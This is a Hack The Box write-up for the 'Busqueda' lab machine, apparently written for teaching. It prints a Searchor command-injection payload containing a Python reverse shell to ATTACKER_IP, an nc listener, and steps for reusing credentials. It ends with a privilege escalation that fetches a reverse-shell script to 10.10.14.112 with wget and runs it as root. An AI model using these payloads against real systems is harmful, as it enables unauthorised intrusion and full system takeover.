Busqueda — Hack The Box
In this write-up, we will solve a box on hackthebox called Busqueda.
Nmap Scan
nmap -sC -sV -Ao nmap/Busqueda 10.10.11.208
we got an ssh port and an HTTP port open.
Web server enumeration
first, get the hostname in the /etc/hosts file.
echo "10.10.11.208 searcher.htb" >> /etc/hosts
if we see the technology used on the webpage
it uses Searchor 2.4.0
after some googling found that it is vulnerable to remote command injection.
got a POC from GitHub
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#
Got the payload ready and fired up your nc listener on the port specified in the payload
nc -nvlp 1234
with the payload filled hit the search.
we got a shell back and our user flag.
Root Privilege escalation
If we enumerate the app folder in the /var/www directory
we got some info in logs and config files.
git log
we got a user called the administrator and a subdomain gitea.searcher.htb
and with
git config -l
we got another user called Cody his password on the subdomain @ gitea.searcher.htb
now lets that subdomain run
edit the /etc/hosts file and add the subdomain in the file
login with Cody’s credentials on the site
we got nothing much on the account but the password we found for Cody is reused as the svc account same account we got Shell for
if we do
sudo -S -l
we can see we run a script system-checkup.py as the root user
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py random
we can these three scripts with the system-checkup file
- docker-ps
these are two containers running on the machine
one is running gitra server and another one is running MySQL server
2. docker-inspect
to use this we need to define formate and container name
we can get different formate from this
for all dump we can use this
dumping gitea container data
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect ‘{{json .}}’ gitea
noting much in the gitea dump
dumping MySQL container data
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect ‘{{json .}}’ mysql_db
we got some passwords in this dump
well nothing much is in the MySQL database
we can try to login to gitra with this credentials as administrator
3. full-checkup
we got an error in this file
we can log in as an administrator with the password we found in the MySQL dump
we got some scripts that we are running we cannot change the script content.
if we see the code of system-checkup.py we can see that the full-check.py full path is not defined in the script
so it can only be run if we are in the same directory as the full-checkup.sh script.
it is located in /opt/scripts directory
see it works if we are in the script directory
but what if we make ower own script and run it
create a rev shell in python bash one will not work
#!/usr/bin/python3
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.112",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")
save it as full-checkup.sh
host it with a Python server
python3 -m http.server 1234
copy the link to the file
start an NC listener
then execute this command in a writable directory /tmp
wget http://10.10.14.112:1234/full-checkup.sh;chmod +x full-checkup.sh; sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
we got our shell as root